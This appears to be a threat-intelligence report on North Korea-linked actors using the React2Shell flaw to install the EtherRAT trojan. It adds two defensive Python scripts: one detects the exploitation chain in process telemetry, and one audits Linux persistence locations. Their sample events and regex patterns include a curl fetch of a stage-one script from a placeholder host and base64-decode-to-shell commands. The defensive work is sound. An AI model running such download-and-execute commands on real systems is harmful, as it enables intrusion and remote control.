Full Report
Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical React2Shell security flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. "EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and
Analysis Summary
# Threat Actor: North Korea-linked Actors (Associated with Contagious Interview)
## Attribution & Identity
* **Attribution:** Threat actors with ties to North Korea.
* **Known Aliases/Associated Groups:** Associated with the long-running campaign codenamed **Contagious Interview**.
## Activity Summary
These actors are exploiting the recently disclosed critical security flaw, **React2Shell (CVE-2025-55182)**, in React Server Components (RSC). This activity shows significant overlap with the Contagious Interview campaign, which historically targets blockchain and Web3 developers. The campaign involves using fake job interviews, coding assignments, and video assessments as a ruse to deploy malware, often initiated via platforms like LinkedIn, Upwork, or Fiverr.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploitation of **CVE-2025-55182** (React2Shell, CVSS 10.0) in React Server Components (RSC) to execute a file download shell command.
* **Execution/Defense Evasion:**
  * Execution begins with a Base64-encoded shell command.
  * Uses `curl` to retrieve a shell script, with `wget` and `python3` as fallbacks.
  * Downloads and installs Node.js v20.10.0 from `nodejs.org`.
  * Writes an encrypted blob and an obfuscated JavaScript dropper to disk.
  * Deletes the initial shell script upon completion to minimize forensic traces.
* **Payload Delivery/C2:** Uses the novel **EtherHiding** technique (observed since Feb 2025) to fetch C2 server URLs from Ethereum smart contracts every five minutes.
* **C2 Resolution Mechanism:** Leverages **consensus voting across nine public Ethereum RPC endpoints** to resolve the C2 URL, enhancing resilience against sinkholing or poisoning.
* **Payload Execution:** The dropper decrypts the **EtherRAT** payload using a hard-coded key and spawns it using the downloaded Node.js binary.
* **Command & Control:** Once connected, the malware enters a 500ms polling loop, interpreting responses longer than 10 characters as JavaScript code to be executed.
* **Persistence:** Deploys **five independent Linux persistence mechanisms**:
  * Systemd user service
  * XDG autostart entry
  * Cron jobs
  * `.bashrc` injection
  * Profile injection
* **Defense Evasion/Maintenance:** Implements a self-update mechanism by sending its source code to an API endpoint, receiving new code, and relaunching a new process with the updated payload.
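The execution chain summarised above (an RSC application server spawning a Base64-decoded shell command, a `curl`/`wget`/`python3` script fetch, and a Node.js download from `nodejs.org`) maps directly onto process-creation telemetry. The following is an added example written for this summary, not code from the report or from the malware: it flags those stages only when the process descends from the application server, so a developer running the same `curl` from an interactive shell is not reported. The event format, the `node`/`next-server` image names and the sample events (including the 203.0.113.5 placeholder host) are constructed assumptions.

```python
#!/usr/bin/env python3
"""Spot the exploitation chain summarised above in process-creation telemetry.

Added example, not code from the report or from the malware: it looks for a
Node.js application server (the RSC host) whose descendants run a
base64-decoded shell command, fetch a script with curl/wget/python3, or pull a
Node.js tarball from nodejs.org. The event format is a constructed, minimal
EDR-style record (one dict per process start with pid, ppid, image, cmdline).
"""
import re

# Constructed assumption: the RSC application runs under one of these images.
APP_SERVER_IMAGES = {"node", "next-server"}

# Stages of the chain from the report, as command-line regexes (constructed).
STAGE_PATTERNS = {
    "base64_decoded_shell": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
    "script_fetch": re.compile(r"\b(curl|wget)\b|\bpython3?\b.*\burllib\b"),
    "nodejs_download": re.compile(r"https?://nodejs\.org/\S+\.tar\.(gz|xz)\b"),
}
MAX_DEPTH = 10  # how far up the parent chain to look for the app server

# Constructed sample telemetry. 203.0.113.5 is a documentation address used as
# a placeholder for the script host; the base64 text decodes to "echo hello".
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "node", "cmdline": "node server.js"},
    {"pid": 101, "ppid": 100, "image": "sh",
     "cmdline": "sh -c echo ZWNobyBoZWxsbw== | base64 -d | sh"},
    {"pid": 102, "ppid": 101, "image": "sh",   "cmdline": "sh"},
    {"pid": 103, "ppid": 102, "image": "curl",
     "cmdline": "curl -fsSL http://203.0.113.5/stage1.sh -o /tmp/stage1.sh"},
    {"pid": 104, "ppid": 102, "image": "curl",
     "cmdline": "curl -O https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz"},
    # A developer's interactive shell doing the same download: not under node,
    # so it is not part of the chain and must not be flagged.
    {"pid": 200, "ppid": 1,   "image": "bash", "cmdline": "bash"},
    {"pid": 201, "ppid": 200, "image": "curl",
     "cmdline": "curl -O https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz"},
]


def ancestry(by_pid, pid):
    """Return the images of the parents of `pid`, nearest first, up to MAX_DEPTH."""
    chain = []
    for _ in range(MAX_DEPTH):
        ev = by_pid.get(pid)
        if ev is None:
            break
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            break
        chain.append(parent["image"])
        pid = parent["pid"]
    return chain


def detect_chain(events):
    """Return one finding per event that matches a stage and descends from the app server."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in sorted(events, key=lambda e: e["pid"]):
        stages = [name for name, rx in STAGE_PATTERNS.items() if rx.search(ev["cmdline"])]
        if not stages:
            continue
        parents = ancestry(by_pid, ev["pid"])
        if not any(img in APP_SERVER_IMAGES for img in parents):
            continue
        findings.append({"pid": ev["pid"], "image": ev["image"],
                         "stages": stages, "parents": parents})
    return findings


if __name__ == "__main__":
    for f in detect_chain(SAMPLE_EVENTS):
        print(f"pid {f['pid']} ({f['image']}): {', '.join(f['stages'])} "
              f"<- {' <- '.join(f['parents'])}")
```

Run against the constructed sample, the three processes under the `node` server (the decoded shell, the script fetch and the Node.js tarball download) are reported with their parent chain, while the identical download from the developer's `bash` session is not. The parent-chain walk is what keeps the rule specific: a Node.js web server has no business spawning `sh -c ... | base64 -d | sh`, whereas `curl` on its own is everyday developer activity.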
## Targeting
* **Sectors:** Blockchain and Web3 developers are explicitly mentioned. The campaign targets developers working in JavaScript and cryptocurrency-centric workflows.
* **Geography:** Not explicitly detailed; the context indicates targeting of environments running Linux/Node.js applications.
* **Victims:** Developers lured through fake job opportunities on platforms like LinkedIn, Upwork, or Fiverr.
## Tools & Infrastructure
* **Malware Families Used:** **EtherRAT** (previously undocumented Remote Access Trojan).
* **Infrastructure (C2):** Ethereum smart contracts utilized for dynamic C2 resolution.
* **External Dependencies:** Downloads Node.js runtime v20.10.0 from **nodejs.org**.
* **Anti-Forensics:** Deletes initial shell scripts; during updates the C2 server returns functionally identical but differently obfuscated versions of the payload.
## Implications
The deployment of EtherRAT signifies a highly sophisticated evolution in North Korean threat operations, specifically targeting the software supply chain and leveraging Web3 infrastructure (Ethereum smart contracts) for resilient, difficult-to-track Command and Control. The comprehensive persistence mechanisms ensure long-term access on compromised Linux systems.
## Mitigations
* Strictly vet all package dependencies, especially in environments using JavaScript/Node.js ecosystems (like npm).
* Implement robust monitoring for unauthorized shell script execution or unusual network requests originating from application build/delivery processes.
* Ensure systems have strong, redundant persistence detection mechanisms (monitoring systemd, cron jobs, and shell profile modifications).
* Monitor for unexpected downloads of tools like Node.js binaries outside of standard deployment pipelines.
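The persistence detection called for above can be implemented as a periodic audit of the five user-level locations the report names (systemd user services, XDG autostart entries, cron jobs, `.bashrc` and the shell profile files). The script below is an added example written for this summary, not code from the report or any vendor tool. It extracts the command actually executed from each file type (`ExecStart=` in unit files, `Exec=` in `.desktop` files, the command field of cron lines, every non-comment line of shell rc files) and flags commands matching constructed heuristics such as a Node.js runtime launched from a hidden directory or a base64-decoded pipe to a shell. The indicator patterns, the `home`/`cron_spool` parameters and the default spool path are assumptions.

```python
#!/usr/bin/env python3
"""Audit the five user-level Linux persistence locations listed in the report.

Added example, not code from the report: walks a home directory plus a cron
spool directory and flags entries whose executed command matches constructed
indicator patterns. Nothing is modified; findings are returned for review.
"""
import re
from pathlib import Path

# Constructed heuristics, not indicators taken from the report: commands that
# rarely belong in a developer's autostart entries.
SUSPICIOUS = {
    "node_runtime": re.compile(r"(^|[/\s])node(\s|$)"),            # a Node.js binary is launched
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b"),       # decoded command text
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),  # download piped to a shell
    "hidden_dir_script": re.compile(r"/\.[\w.-]+/.*\.js\b"),        # .js file under a dot-directory
}

# Which line carries the executed command in each structured file type.
EXEC_LINE = {
    "systemd_user_service": re.compile(r"^\s*Exec(Start|StartPre|StartPost)\s*=\s*(.*)$"),
    "xdg_autostart": re.compile(r"^\s*Exec\s*=\s*(.*)$"),
}


def _command_lines(kind, path):
    """Yield (line_no, command_text) for the lines that actually run something."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if kind in EXEC_LINE:
            m = EXEC_LINE[kind].match(line)
            if m:
                yield no, m.group(m.lastindex)
        else:
            # cron lines and shell rc/profile lines: the whole line is a command
            yield no, stripped


def _glob(directory, pattern):
    return sorted(p for p in directory.glob(pattern) if p.is_file()) if directory.is_dir() else []


def candidate_files(home, cron_spool):
    """Map each persistence location named in the report to the files to inspect."""
    home, cron_spool = Path(home), Path(cron_spool)
    return {
        "systemd_user_service": _glob(home / ".config/systemd/user", "*.service"),
        "xdg_autostart": _glob(home / ".config/autostart", "*.desktop"),
        "cron": _glob(cron_spool, "*"),  # per-user crontab files (assumed spool layout)
        "bashrc": [p for p in [home / ".bashrc"] if p.is_file()],
        "profile": [p for p in (home / ".profile", home / ".bash_profile", home / ".zshrc")
                    if p.is_file()],
    }


def audit_persistence(home, cron_spool):
    """Return one finding per suspicious command across all five locations."""
    findings = []
    for kind, files in candidate_files(home, cron_spool).items():
        for path in files:
            for no, cmd in _command_lines(kind, path):
                hits = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
                if hits:
                    findings.append({"location": kind, "file": str(path), "line": no,
                                     "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    import json
    import os
    import sys
    home_dir = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    spool_dir = sys.argv[2] if len(sys.argv) > 2 else "/var/spool/cron/crontabs"  # Debian layout
    print(json.dumps(audit_persistence(home_dir, spool_dir), indent=2))
```

Usage: `python3 audit_persistence.py /home/dev /var/spool/cron/crontabs` prints findings as JSON; run it for each interactive user, and pair it with file-integrity monitoring on the same paths so an entry that appears between audits is caught rather than only the one present at audit time. Matching on the executed command rather than on file presence matters here because every one of the five locations legitimately exists on a developer workstation; what is abnormal is a Node.js runtime or decoded script being launched from them.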